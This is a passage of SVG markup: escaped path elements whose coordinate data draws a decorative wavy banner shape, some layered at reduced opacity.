53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path 